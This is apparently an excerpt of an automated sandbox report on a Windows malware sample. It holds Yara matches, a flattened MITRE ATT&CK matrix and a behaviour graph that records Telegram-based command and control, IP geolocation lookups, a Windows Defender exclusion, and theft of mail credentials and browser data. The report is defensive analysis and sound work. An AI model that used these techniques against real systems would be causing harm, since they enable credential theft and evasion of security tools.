                    Source: Yara matchFile source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts12
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory13
                    System Information Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		3
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                    Obfuscated Files or Information                    		Security Account Manager1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		11
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS1
                    Security Software Discovery                    		Distributed Component Object Model1
                    Clipboard Data                    		4
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets2
                    Process Discovery                    		SSHKeylogging15
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials31
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1596649 Sample: 299371485_14108825808_17363... Startdate: 22/01/2025 Architecture: WINDOWS Score: 100 24 reallyfreegeoip.org 2->24 26 api.telegram.org 2->26 28 2 other IPs or domains 2->28 36 Suricata IDS alerts for network traffic 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 46 11 other signatures 2->46 8 299371485_14108825808_1736351479899.exe 4 2->8         started        signatures3 42 Tries to detect the country of the analysis system (by using the IP) 24->42 44 Uses the Telegram API (likely for C&C communication) 26->44 process4 file5 22 299371485_14108825...36351479899.exe.log, ASCII 8->22 dropped 48 Adds a directory exclusion to Windows Defender 8->48 12 299371485_14108825808_1736351479899.exe 15 2 8->12         started        16 powershell.exe 23 8->16         started        signatures6 process7 dnsIp8 30 api.telegram.org 149.154.167.220, 443, 49789, 49844 TELEGRAMRU United Kingdom 12->30 32 checkip.dyndns.com 158.101.44.242, 49712, 49722, 49733 ORACLE-BMC-31898US United States 12->32 34 reallyfreegeoip.org 104.21.16.1, 443, 49713, 49716 CLOUDFLARENETUS United States 12->34 50 Tries to steal Mail credentials (via file / registry access) 12->50 52 Tries to harvest and steal browser information (history, passwords, etc) 12->52 54 Loading BitLocker PowerShell Module 16->54 18 WmiPrvSE.exe 16->18         started        20 conhost.exe 16->20         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.